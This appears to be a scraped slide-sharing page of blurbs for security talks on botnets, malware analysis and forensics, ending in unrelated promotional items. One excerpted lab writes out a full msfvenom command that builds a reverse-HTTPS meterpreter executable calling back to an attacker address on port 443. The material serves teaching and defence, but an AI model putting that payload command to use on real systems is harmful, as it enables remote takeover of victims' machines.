From the infection phase to the command & control functionalities, this talk is a 360 degrees analysis of a recent Russian botnet distribution package. Particular features of this botnet are communication over HTTP protocol and use of PHP and Mysql.
This document summarizes several Windows registry keys and artifacts that can provide information about a user's digital activities. It describes keys that track recently opened files, installed applications, browser history and search terms, network connections, and more. Examining these locations can reveal details like the files and websites a user accessed, when they were accessed, and from where they originated.
CNIT 126: 10: Kernel Debugging with WinDbgSam Bowne
Slides for a college course at City College San Francisco. Based on "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software", by Michael Sikorski and Andrew Honig; ISBN-10: 1593272901.
Instructor: Sam Bowne
Class website: https://samsclass.info/126/126_F19.shtml
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...CODE BLUE
Japan is recently experiencing a rise in targeted attacks. However, it is rare that details of such attacks are revealed. Under this circumstance, JPCERT/CC has been investigating the attack operations targeting Japanese organizations including the government and leading enterprises. We have especially been tracking two distinct cases over a prolonged period.
The first case, which became public in 2015, drew nationwide attention for victimizing several Japanese organizations. In this case, the attacker conducts sophisticated attacks through network intrusion and targeting weak points of the organizations.
The second case has been continuously targeting certain Japanese organizations since 2013. Although this case has not drawn as much attention, the attacker has advanced techniques and uses various interesting attack methods.
This presentation will introduce the above two attack operations, including attack techniques we revealed through prolonged investigation, the malware/tools being used, as well as useful techniques/tools for analyzing related malware.
Anomalies Detection: Windows OS - Part 1Rhydham Joshi
Anomalies Detection: Windows OS- Part 1 describes in detail about Malware Investigation steps. It focuses on Identifying process anomalies, RootKit detection,
A college lecture at City College San Francisco. Based on "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software", by Michael Sikorski and Andrew Honig; ISBN-10: 1593272901.
Instructor: Sam Bowne
Class website: https://samsclass.info/126/126_S17.shtml
- Malware analysis involves both static and dynamic analysis techniques to understand malware behavior and assess potential damage. Static analysis involves disassembling and reviewing malware code and structure without executing it. Dynamic analysis observes malware behavior when executed in an isolated virtual environment.
- Tools for static analysis include file hashing, string extraction, and PE header examination. Dynamic analysis tools monitor the registry, file system, processes, and network traffic created by malware runtime behavior. These include Process Monitor, Wireshark, Process Explorer, and network sniffers.
- To safely conduct malware analysis, one should create an isolated virtual lab separated from production networks, and install behavioral monitoring and code analysis tools like OllyDbg, Process Monitor, and Wiresh
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbgSam Bowne
This document discusses using WinDbg for kernel debugging and analyzing rootkits. It explains that WinDbg can debug in both user-mode and kernel-mode, unlike OllyDbg which is only for user-mode. Device drivers run code in the Windows kernel and are difficult to analyze. The DriverEntry routine is called when a driver is loaded and it registers callback functions. Malware often imports functions from Ntoskrnl.exe and Hal.dll to manipulate the kernel. WinDbg commands like bp, lm, and dt are demonstrated for setting breakpoints, listing modules, and viewing structures. Symbol files from Microsoft provide function and structure names to make debugging easier.
The document provides an overview of exploit kits, including common exploit kit names (e.g. Fiesta, Angler), the phases of an exploit kit attack (compromised site, redirector, landing page, post-infection traffic), exploits used across browsers/plugins (e.g. IE, Java, Flash), evasion techniques (e.g. obfuscation), and includes a technical analysis of the CVE-2014-0515 Flash exploit.
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, Powershell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and most interesting events to look for when hunting for evidence of each technique.
This document discusses fileless attacks, which use existing software and authorized protocols to carry out malicious activities without downloading files. Fileless attacks can use things like PowerShell, WMI, browsers, and Office applications to connect to command and control servers and execute malicious scripts in memory only. Some behaviors and evidence of fileless attacks include unusual child processes starting, legitimate DLLs loading from unexpected parents, and applications like Word or Excel invoking PowerShell or making network connections. The document demonstrates detecting fileless attacks using Event IDs in Windows logs related to process creation and PowerShell pipeline execution details.
This document discusses various types of malware behaviors including downloaders and launchers, backdoors, credential stealers that use techniques like GINA interception, hash dumping tools like Pwdump, keystroke loggers, and persistence mechanisms like registry modifications and DLL load-order hijacking. It also covers user-mode rootkits that hide malware by hooking the import address table or inline hooking API functions.
This document provides a summary of key Volatility plugins and memory analysis steps. It outlines plugins for identifying rogue processes, analyzing process DLLs and handles, reviewing network artifacts, checking for code injection evidence, looking for rootkit signs, and dumping suspicious processes/drivers. The document also provides information on memory acquisition, converting hibernation files and dumps, artifact timelining, and registry analysis plugins.
This document discusses forensic analysis on Windows systems. It provides an overview of important Windows artifacts for forensic investigation including the registry, event logs, file system metadata and memory analysis. Specific tools are also mentioned for acquiring disk and memory images, parsing timelines, analyzing the registry and memory, including FTK Imager, SIFT, Redline, Volatility and REGRIPPER. An example case is described where crypto-mining malware was found running on a system through analysis of process listings, file system metadata and logs.
One-Byte Modification for Breaking Memory Forensic AnalysisTakahiro Haruyama
The document proposes a one-byte modification method to potentially abort memory forensic analysis tools without impacting the running system or hiding specific objects. It identifies three sensitive operations in memory analysis: 1) virtual address translation in kernel space, 2) guessing the OS version and architecture, and 3) getting kernel objects like processes. For each operation, it outlines how top tools like Volatility and Memoryze perform the operation and identifies specific "abort factors", or one-byte values that could be modified to abort the analysis without direct detection. Modifying these factors could stop analysis tools from functioning properly without blue screening the system or hiding specific objects.
This document introduces tools and techniques for preliminary malware analysis. It discusses examining malware behavior through static analysis, behavioral tracing, and sandboxing. Specific tools are presented for observing malware snapshots, tracing its behavior, and containing it in a sandbox. Process-based and stealthy malware are discussed, along with vulnerabilities of rootkits and tools for rootkit detection. The goal is to present a model for beginning reverse engineering of malware through observation and experimentation in a contained environment.
This document provides an overview of analyzing Windows crashes. It discusses introducing the Driver Verifier tool to identify code defects in drivers, using kernel debuggers to view crash dumps and perform basic crash analysis, and advanced debugging techniques like attaching a kernel debugger for debugging initialization failures. The document also covers the author's experience of 7 years at Microsoft and 3 years at Digital Equipment Corporation, as well as instructor experience with David Solomon.
Kunal - Introduction to backtrack - ClubHack2008ClubHack
BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Common attack techniques explored include man-in-the-middle attacks using ARP poisoning, password cracking through tools like John the Ripper, and hacking web servers through techniques like Google hacking.
BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Attackers can use these tools along with techniques like ARP poisoning to conduct remote exploits or hack passwords on Windows systems.
This document summarizes Ajit Skanda Kumarawamy's literature study presentation on botnet detection and mitigation techniques. It introduces topics like the Storm worm, BotHunter, BotSniffer, RBSeeker, and the Torpig botnet takeover. Detection methods discussed include signature-based and anomaly-based detection. Mitigation generally involves acquiring and analyzing bots, infiltrating the botnet, and identifying and taking down the command-and-control server and botmaster. Case studies provide examples of analyzing botnet infrastructure and behaviors.
The document describes a global botnet detector that was created to detect botnet activity across multiple countries in near real-time. It works by aggregating web traffic data from various sites, calculating correlations between traffic from different countries, and flagging coordinated spikes as potential botnet alerts. It then analyzes user behavior from the flagged countries to produce a list of suspect botnet participants and their threat scores. The tool was able to successfully detect a real botnet attack and identify all of the users responsible based on an investigation for a customer. Future work could integrate it into a machine learning product and address limitations like intra-country botnet activity.
This document summarizes a study on botnet detection techniques. It outlines that botnets pose a serious cybersecurity threat and discusses various botnet detection approaches including signature-based, anomaly-based, host-based, and network-based methods. The document then focuses on two proposed techniques: 1) Using an adaptive learning rate neural network to detect HTTP botnets based on TCP connection features. Evaluation shows it achieved over 99% detection accuracy. 2) Using a Hidden Semi-Markov Model with SNMP MIB variables to characterize normal network behavior and detect botnets, achieving over 98% accuracy on spyware and BlackEnergy botnets.
The Godfather - P2P Botnets: Security & CommunicationArturBalanuta
This document discusses peer-to-peer botnets. It covers how botnets are propagated through various means like phishing, social engineering, infected files, and mobile device infections. It then discusses different models for organizing botnets, including centralized command and control, unstructured control, and peer-to-peer overlay networks. The rest of the document focuses on designing a secure peer-to-peer botnet including topics like peer entry, secure dissemination of commands, peer-to-peer trust systems, proof-of-work, and monetization models.
Support des stagiaires Mehdi, Iskander et Christopher de la session "Expert sécurité digitale 5" de l'école Aston.
Cette exercice permet à pour objectif la création d'un botnet afin de comprendre les mécanismes pour mieux s'en défendre.
Les supports et vidéos sont accessibles sur le https://expertsecuritedigitale.blogspot.fr/
The Harvester, the Botmaster, and the Spammer: On the Relations Between the D...Gianluca Stringhini
This document analyzes the relationships between different actors in spam operations. It fingerprints email harvesters, botnets, and spammers by analyzing their behaviors and techniques. It finds that 9 harvesters were used to collect over 600 email addresses. 2,024 spam emails were sent by 7 botnet dialects. Spam campaigns were clustered by topic and different spammers were found to use the same botnets and email lists over long periods of time. The study presents the first end-to-end analysis of the spam delivery ecosystem and finds spammers leverage the same resources for mitigation.
Cryptovirology Introduction, SecurityThreats, Safeguards and CountermeasuresM Mehdi Ahmadian
Cryptovirology Introduction, SecurityThreats,
Safeguards and Countermeasures
معرفی رمزکار ویروس شناسی ،تهدیدات امنیتی، راهکاری های حفاظت و مقابله با آنها
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1 securityxploded
This presentation is part of our Advanced Malware Analysis Training Series program.
For more details refer our Security Training page
http://securityxploded.com/security-training.php
The document proposes a design for an advanced hybrid peer-to-peer botnet that is harder for defenders to detect and shut down. It describes existing centralized botnets that rely on command-and-control servers that can be shut down. The proposed design uses a hybrid peer-to-peer architecture with servent and client bots to distribute commands across the network in a decentralized way. It also describes how the botmaster can monitor the entire botnet by having bots report information directly. Defenders could use honeypots to detect and block the botnet, but it may still be difficult to monitor without exposing the honeypots.
The document discusses malware analysis techniques including static analysis, dynamic analysis, and memory analysis. Static analysis involves examining a file without executing it to determine things like file type and cryptographic hash. Dynamic analysis involves executing malware in a controlled environment to observe its behavior, such as file system, process, registry, and network activity. Memory analysis examines a computer's RAM to find artifacts and reveal hidden processes, network connections, and registry modifications. The document provides examples of analyzing a Zeus bot sample using these techniques.
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysissecurityxploded
This presentation is part of our Reverse Engineering & Malware Analysis Training program.
For more details refer our Security Training page
http://securityxploded.com/security-training.php
This document discusses various tools and techniques for performing basic dynamic malware analysis, including sandboxes, Process Monitor, Process Explorer, and Regshot. It explains how sandboxes like GFI Sandbox can provide initial analysis of malware but have limitations. Process Monitor and Process Explorer allow monitoring processes, registry changes, and other activity in real-time. Regshot facilitates comparing registry snapshots before and after malware is run.
Cyber Defense Forensic Analyst - Real World Hands-on ExamplesSandeep Kumar Seeram
The document discusses analyzing malware using static and dynamic analysis techniques. Static analysis involves examining a malware file's code and structure without executing it, using tools like disassemblers and string extractors. Dynamic analysis executes malware in a controlled environment to observe its behaviors and any changes it makes. The document then demonstrates analyzing the "Netflix Account Generator" malware using an isolated cloud sandbox, where it is observed starting child processes and making outbound network connections, suggesting it is a remote access trojan.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
This malware analysis document discusses a piece of malware that disguises itself as an MSN and Yahoo updater. It unpacks itself using UPX and WinRAR, then modifies the registry and loads HTML files to redirect the user to malicious sites and install adware. The malware aims to circumvent security settings and install additional software onto the system.
The document describes a procedure for using batch scripting and common tools to identify intrusions on a Microsoft Windows system. The script generates trending data by checking for unusual processes, services, accounts, files and connections. It analyzes the operating system version, registry entries, scheduled tasks, event logs and more. The final summary is a sample batch script that automates running various commands to collect security-related data and output it to log files for administrator review.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
Malware analysis is important for responding quickly to security incidents and keeping costs down. Malware is the number one external threat and is adapting to evade traditional defenses like firewalls and antivirus software. When incidents do occur, organizations should have an in-house capability to analyze malware using free and open-source tools to understand the scope of infections and prevent recurrences.
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docxeugeniadean34240
1RUNNING HEAD: MANAGING HOST BASED SECURITY IN WINDOWS 8.1
Lab Deliverable for Lab 2
a. Procedure to Manage Windows Defender
Operating Environment:
1. Operating System: Windows 8.1 Pro
2. Hardware: A Laptop
3. Software: VMware Horizon Client Installed
Description:
This window configuration project will require the sytem admin permission so as to access the programs and get to know how it is commanded to the action it should peform. Also, to use a virtual box one should have knowledge in how to operate the virtual box and explore the virtual programs
Notes, Warnings and Restrictions:
1. Windows Defender come with windows 8.1 software and are found in the control panel.
2. The application is used only when you login your system as an administarator or have permitted to act as the administrator.
3. For windows defender to run in the system it should be turned on and no other antivirus should be active
4. Scanning the system with windows defender deletes infected files. Also ensure you do the required scanning
5. If a different anti virus has been previously deleted, then windows defender needs to be turned off and to be restarted
Resources (Futher Reading):
Firewalls. (n.d.). Retrieved from https://technet.microsoft.com/en-us/library/cc700820.aspx
Microsoft Baseline Security Analyzer. (2011). Retrieved from https://dougvitale.wordpress.com/2011/11/18/microsoft-baseline-security-analyzer/
CloudFlare. (n.d.). Retrieved from https://www.winhelp.us/configure-windows-defender-in-windows-8.html
Procedures:
Windows defender
Window defender protects a computer system against any form of malware by running in the background of the computer system and gives notification if any suspicious item is found in the syatem for the user to take action. It can also be used by a computer to scan the system if the system has issues e.g becomes slow, switches off when not commanded to, hanging among other things. Windows defender should be updated over time so that it is not outdated and also to improve its performance.
Windows defender is found in the control panel icon, steps of opening are
i. Open control panel and select “windows defender”
ii. While you click on windows defender, the following page appears
a) To update the system click on “update”
b) Real time scanning
c) For the full scan results it will appear in the table as shown below
d) For quick results check the button just before you click on scan. Then the results will appear as shown below.
e) To scan removable device, select “setting” and click on advance
Then check the box just before removing any removable drivers and click save
b. Procedure to configure Windows Firewall for Windows 8.1
Operating Environment:
1. Operating System: Windows 8.1 Pro
2. Hardware: A Laptop
3. Software: VMware Horizon Client Installed
Descriptions:
Windows firewall is a protection application that protects against suspicious items, It helps in blocking suspicious programs .
Matt Oh, Microsoft
We are seeing new technique used everyday by malware. But, it is very hard to find any impressive techniques used in the wild. Recently there was huge buzz about Detrahere malware which used internally known issues with certificate signing in Windows 10 kernel driver. Even though the certificate check bypass technique itself is very interesting, also I found that the tactics used by the malware is more impressive. Even though the malware is mainly focused on Ad-hijacking functionality through Netfilter driver installation, but it also has rootkit ability through file system driver hooking. This feels like old days coming back with various new arsenals. The rootkit detects kernel debugging settings and will destroy the system when it finds one. The unpacking process can be very challenging job, too as it uses kernel driver image hollowing technique (something similar to process hollowing) to deobfuscate itself and run unpacked code. Our patchguard doesn't seem like triggering on this action, because all the sections are pre-allocated with execute permission already.
Through this talk, I want to present various techniques used by this malware focusing on the kernel level obfuscation and anti-analysis tactics. This will give us new insights on how new Windows rootkit malware might look like in the future and how detecting them from security systems and detonation systems can be a challenge.
The Crisis malware is an advanced malware that infects both Windows and Mac computers. It has the ability to steal browser history, contacts, audio/visual recordings and more. It spreads initially through a signed Java applet and then installs core modules and drivers onto the infected system. Both Windows and Mac versions share similar information stealing and command and control capabilities. The Windows version uniquely targets virtual machines by mounting and infecting VM disk images, and can also steal social media and email account information. The malware authors remain anonymous but the code quality suggests it was intended for espionage or private investigation.
SANS Digital Forensics and Incident Response Poster 2012Rian Yulian
This document outlines a 13-step process for analyzing a system for signs of malware infection. The steps include: reducing evidence files, performing antivirus checks, searching for indicators of compromise, automated and manual memory analysis, checking for persistence mechanisms, entropy/packing analysis, reviewing event logs, timeline analysis, third-party hash lookups, and analyzing MFT and file time anomalies. The goal is to methodically narrow down thousands of files to the few most likely to be malware through successive rounds of filtering and examination.
Reversing & malware analysis training part 9 advanced malware analysisAbdulrahman Bassam
The document discusses a training program on reverse engineering and malware analysis. It provides an overview of static analysis, dynamic analysis and memory analysis techniques. It also includes a demonstration of analyzing a Zeus bot sample using these techniques. The demonstration shows taking the cryptographic hash, determining imports, submitting to VirusTotal, monitoring process, registry and network activity while executing in a sandbox, analyzing the memory dump with Volatility and more.
The document summarizes a presentation given by Tomer Teller about the Stuxnet malware. It describes how Stuxnet infected industrial control systems by exploiting Windows vulnerabilities, spreading on removable drives, and ultimately reprogramming PLCs to sabotage Iran's nuclear program. Key infection techniques discussed include exploiting LNK and Print Spooler vulnerabilities, using autorun.inf files and rootkit techniques to propagate, and replacing DLL files to monitor and inject commands to PLCs.
This document provides an overview of reversing and malware analysis training. It discusses the purpose of malware analysis, different analysis techniques including static analysis, dynamic analysis and memory analysis. It provides examples of tools used for each technique like strings, PEview, and Volatility. The document demonstrates these concepts on a Zeus bot sample, showing its network activity, process and registry behavior through monitoring tools. Memory analysis with Volatility reveals hidden processes and network connections. The training aims to understand a malware's behavior and interaction with the system.
HoneyNet SOTM 32 - Windows Malware AnalysisChetan Ganatra
The document provides details about analyzing a malware binary called RaDa.exe. It describes initial setup steps like verifying the file integrity and checking for known viruses. The binary was found to be packed with UPX but modified after compression to prevent decompression. Through static and dynamic analysis, it was determined that RaDa.exe installs itself to automatically run on startup, tries flooding a target IP address, and has capabilities to upload files via HTTP. A Snort signature is proposed to detect similar malware specimens. The document also lists techniques used in the binary to prevent reverse engineering like stripping debugging information and packing.
This document discusses techniques for threat hunting on Windows systems. It covers key areas to focus on during incident triage like processes, network connections, filesystem artifacts and logs. It also describes general hunting scenarios using threat intelligence or without intelligence. Specific techniques and artifacts discussed include the Windows Task Scheduler, ShimCache, AmCache, RecentFileCache, rogue services, timeline analysis using MFT, DLL side loading, DLL injection rootkits, autoruns, and the Wdigest credential storage downgrade attack. The document provides details on what to look for and analyze to effectively hunt for threats on Windows.
UEFI Firmware Rootkits: Myths and RealitySally Feller
Earlier this month, we teased a proof of concept for UEFI ransomware which was presented at RSA Conference 2017. The HackingTeam, Snowden, Shadow Brokers, and Vault7 leaks have revealed that UEFI/BIOS implants aren't just a theoretical concept but have actually been weaponized by nation states to conduct cyber espionage. Physical access requirements are a thing of the past, these low level implants can be installed remotely by exploiting vulnerabilities in the underlying UEFI system.
Today at BlackHat Asia 2017, we are disclosing two vulnerabilities in two different models of the GIGABYTE BRIX platform:
GB-BSi7H-6500 – firmware version: vF6 (2016/05/18)
GB-BXi7-5775 – firmware version: vF2 (2016/07/19)
Similar to Black Energy18 - Russian botnet package analysis (20)
I got 99 trends and a # is all of them or How we found over 100 200+ RCE vulnerabilities in Trend Micro software.
Presentation released at Hack In The Box 2017 Amsterdam, by Roberto Suggi Liverani @malerisch and Steven Seeley @steventseeley.
For more information, please visit: http://blog.malerisch.net or http://srcincite.io
This talk intends to demonstrate how to improve web application security testing by combining browser automation framework and web proxy API.
The goal of this research is to bring a web proxy as close as possible to a browser to achieve a better security testing coverage, especially when dealing with complex client-side technology.
The presentation includes a montage of real case scenarios, showing how this approach can lead to the discovery of vulnerabilities which might otherwise go unnoticed.
Cross Context Scripting (XCS) is a type of XSS (Cross Site Scripting) injection which occurs from an untrusted zone, typically a web page on the Internet into the context of a trusted browser zone.
XSS injection in a trusted browser zone can be 'lethal', as injected payload runs as privileged code. No SOP (Same-Origin Policy) restrictions are enforced and direct interfacing with the underlying OS is possible.
To exploit such bugs, there is no need to use ROP gadgets, spray the heap or attempt other complex techniques. At the opposite, only few elements are required for a successful exploit, such as the right injection point and a tailored exploit payload.
This presentation will examine XCS in details and will provide a demonstration of XCS exploits of both unpatched and patched vulnerabilities in Firefox, Opera, Maxthon and Avant browsers.
Web browsers have become part of everyday life, and are relied upon by millions of internet citizens each day. The feature rich online world has turned the once simple web browser into a highly complex (and very often insecure) desktop application.
As browser vendors have extended functionality and support to new technologies, security researchers and hackers are continuously looking for new vulnerabilities. In this talk, Roberto and Scott will share results of their assiduous browser bug hunting. The talk will examine techniques used to discover critical and less severe vulnerabilities in some of the most popular browsers on the market.
This talk will focus heavily (but not exclusively) on the following areas:
- Memory corruption bugs;
- New approaches to DOM fuzzing;
- Old school techniques against new browser technology;
- Cross Context Scripting and injection attacks;
- SOP Bypass;
The presentation will conclude with a montage of on-stage demonstrations of previously unreleased vulnerabilities, including remote code execution, injections and other tailored browser exploits.
Black Search Engine Optimisation (SEO), often referred as negative SEO, is a term that covers sabotage techniques aiming to reduce a web site's ranking in search engine results. Black SEO techniques are typically used in business and socio-political contexts, such as information warfare.
The presentation will focus on the use of these techniques to discredit a web site by making it vanish from the major search engine result pages. The discussion will also cover how to exploit common web application vulnerabilities such as Cross Site Scripting, SQL injection and other popular exploitation methods to leverage black SEO attacks. Examples will be included to demonstrate each method of exploitation, and how the vulnerabilities can be used to impact revenues and the reputation of business and political targets.
Black SEO attacks represent a unique class of threats and from a security perspective, any threat which can incur a potential loss should be considered a risk. So far, some of these techniques have only existed as a discussion topic in the SEO industry. Consequently, the intent of my presentation is to bring this complex topic to light to the security community.
When performing a security testing, I often sit in a room with other QA and Software testers.
During that time, it is likely I receive questions such as: "Roberto, are you hacking this? Are you breaking
this again? What exactly are you testing?"
Whi l e talking to them I realise there is an information gap between us, especially when they share
information which is essential for my testing and crucial to identify security vulnerabilities.
After a good number of security tests, I came to a conclusion that people in our industry do not realise that
software testing and security testing have a lot to share.
This talk intends to reduce that information gap and provides an introduction to security software testing,
methodologies, and most importantly offers some food for thought to stimulate synergy between security
and software testers
Abstract:
Secure code practices, system hardening, due diligence and due care principles are paramount in mitigating application level DoS attacks. These attacks often result in significant damage against unprepared and vulnerable organisations.
The intent of this talk is to help organisations in strengthening their security posture against such attacks. The talk will explore most common application level DoS attacks and will provide recommendations for protecting applications, detecting attacks and how to react under stressful conditions.
Hundreds of Firefox addons are created every week. Millions of users download them. Some addons are even recommended by the Mozilla community, and users implicitly trust them. We don't trust a single one, and we will show you why.
This talk details how we have abused some of the most popular and recommended Firefox addons, with previously unreleased vulnerabilities. From the Mozilla download statistics, over 15 million users are potentially affected. Demos will cover remote code execution, local file disclosure and other tailored Firefox Addon exploits.
Don't panic - the Addons manager can be found under the 'Tools' tab in your Firefox menu. We expect to see a lot of people clicking the "Uninstall" button after this presentation.
This presentation introduces some of the web spam techniques used against search engines. This talk is complimentary to the presentation "Black SEO Exposed". Some real examples are discussed and illustrated, including exploitation of web application vulnerabilities.
This document provides an overview of JavaScript reversing techniques. It discusses JavaScript technologies like the DOM, Ajax, and JSON. It covers security aspects like the same-origin policy. It provides tips for analyzing JavaScript using tools like Firebug. It also demonstrates finding vulnerabilities like DOM-based XSS and reversing obfuscated JavaScript.
This talk highlights potential attacks against web application using Ajax and XHR technology. The first part of the talk introduces Ajax and related technologies. Second part of the talk focuses on potential attacks and consequences, including some scenario where SOP (Same of origin) policy is bypassed.
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
UiPath Community Day Amsterdam: Code, Collaborate, ConnectUiPathCommunity
Welcome to our third live UiPath Community Day Amsterdam! Come join us for a half-day of networking and UiPath Platform deep-dives, for devs and non-devs alike, in the middle of summer ☀.
📕 Agenda:
12:30 Welcome Coffee/Light Lunch ☕
13:00 Event opening speech
Ebert Knol, Managing Partner, Tacstone Technology
Jonathan Smith, UiPath MVP, RPA Lead, Ciphix
Cristina Vidu, Senior Marketing Manager, UiPath Community EMEA
Dion Mes, Principal Sales Engineer, UiPath
13:15 ASML: RPA as Tactical Automation
Tactical robotic process automation for solving short-term challenges, while establishing standard and re-usable interfaces that fit IT's long-term goals and objectives.
Yannic Suurmeijer, System Architect, ASML
13:30 PostNL: an insight into RPA at PostNL
Showcasing the solutions our automations have provided, the challenges we’ve faced, and the best practices we’ve developed to support our logistics operations.
Leonard Renne, RPA Developer, PostNL
13:45 Break (30')
14:15 Breakout Sessions: Round 1
Modern Document Understanding in the cloud platform: AI-driven UiPath Document Understanding
Mike Bos, Senior Automation Developer, Tacstone Technology
Process Orchestration: scale up and have your Robots work in harmony
Jon Smith, UiPath MVP, RPA Lead, Ciphix
UiPath Integration Service: connect applications, leverage prebuilt connectors, and set up customer connectors
Johans Brink, CTO, MvR digital workforce
15:00 Breakout Sessions: Round 2
Automation, and GenAI: practical use cases for value generation
Thomas Janssen, UiPath MVP, Senior Automation Developer, Automation Heroes
Human in the Loop/Action Center
Dion Mes, Principal Sales Engineer @UiPath
Improving development with coded workflows
Idris Janszen, Technical Consultant, Ilionx
15:45 End remarks
16:00 Community fun games, sharing knowledge, drinks, and bites 🍻
Airports, banks, stock exchanges, and countless other critical operations got thrown into chaos!
In an unprecedented event, a recent CrowdStrike update had caused a global IT meltdown, leading to widespread Blue Screen of Death (BSOD) errors, and crippling 8.5 million Microsoft Windows systems.
What triggered this massive disruption? How did Microsoft step in to provide a lifeline? And what are the next steps for recovery?
Swipe to uncover the full story, including expert insights and recovery steps for those affected.
Increase Quality with User Access Policies - July 2024Peter Caitens
⭐️ Increase Quality with User Access Policies ⭐️, presented by Peter Caitens and Adam Best of Salesforce. View the slides from this session to hear all about “User Access Policies” and how they can help you onboard users faster with greater quality.
Using ScyllaDB for Real-Time Write-Heavy WorkloadsScyllaDB
Keeping latencies low for highly concurrent, intensive data ingestion
ScyllaDB’s “sweet spot” is workloads over 50K operations per second that require predictably low (e.g., single-digit millisecond) latency. And its unique architecture makes it particularly valuable for the real-time write-heavy workloads such as those commonly found in IoT, logging systems, real-time analytics, and order processing.
Join ScyllaDB technical director Felipe Cardeneti Mendes and principal field engineer, Lubos Kosco to learn about:
- Common challenges that arise with real-time write-heavy workloads
- The tradeoffs teams face and tips for negotiating them
- ScyllaDB architectural elements that support real-time write-heavy workloads
- How your peers are using ScyllaDB with similar workloads
Understanding the NFT marketplace ecosystem involves exploring platforms for creating, buying, selling, and trading digital assets. These platforms use blockchain technology for security and smart contracts for automated transactions. Key components include digital wallets, NFT standards, and marketplaces like OpenSea and Rarible. This ecosystem is shaped by the roles of creators, collectors, and developers, offering insights into the dynamics and trends of the digital asset economy.
Jacquard Fabric Explained: Origins, Characteristics, and Usesldtexsolbl
In this presentation, we’ll dive into the fascinating world of Jacquard fabric. We start by exploring what makes Jacquard fabric so special. It’s known for its beautiful, complex patterns that are woven into the fabric thanks to a clever machine called the Jacquard loom, invented by Joseph Marie Jacquard back in 1804. This loom uses either punched cards or modern digital controls to handle each thread separately, allowing for intricate designs that were once impossible to create by hand.
Next, we’ll look at the unique characteristics of Jacquard fabric and the different types you might encounter. From the luxurious brocade, often used in fancy clothing and home décor, to the elegant damask with its reversible patterns, and the artistic tapestry, each type of Jacquard fabric has its own special qualities. We’ll show you how these fabrics are used in everyday items like curtains, cushions, and even artworks, making them both functional and stylish.
Moving on, we’ll discuss how technology has changed Jacquard fabric production. Here, LD Texsol takes center stage. As a leading manufacturer and exporter of electronic Jacquard looms, LD Texsol is helping to modernize the weaving process. Their advanced technology makes it easier to create even more precise and complex patterns, and also helps make the production process more efficient and environmentally friendly.
Finally, we’ll wrap up by summarizing the key points and highlighting the exciting future of Jacquard fabric. Thanks to innovations from companies like LD Texsol, Jacquard fabric continues to evolve and impress, blending traditional techniques with cutting-edge technology. We hope this presentation gives you a clear picture of how Jacquard fabric has developed and where it’s headed in the future.
Leading Bigcommerce Development Services for Online RetailersSynapseIndia
As a leading provider of Bigcommerce development services, we specialize in creating powerful, user-friendly e-commerce solutions. Our services help online retailers increase sales and improve customer satisfaction.
How CXAI Toolkit uses RAG for Intelligent Q&AZilliz
Manasi will be talking about RAG and how CXAI Toolkit uses RAG for Intelligent Q&A. She will go over what sets CXAI Toolkit's Intelligent Q&A apart from other Q&A systems, and how our trusted AI layer keeps customer data safe. She will also share some current challenges being faced by the team.
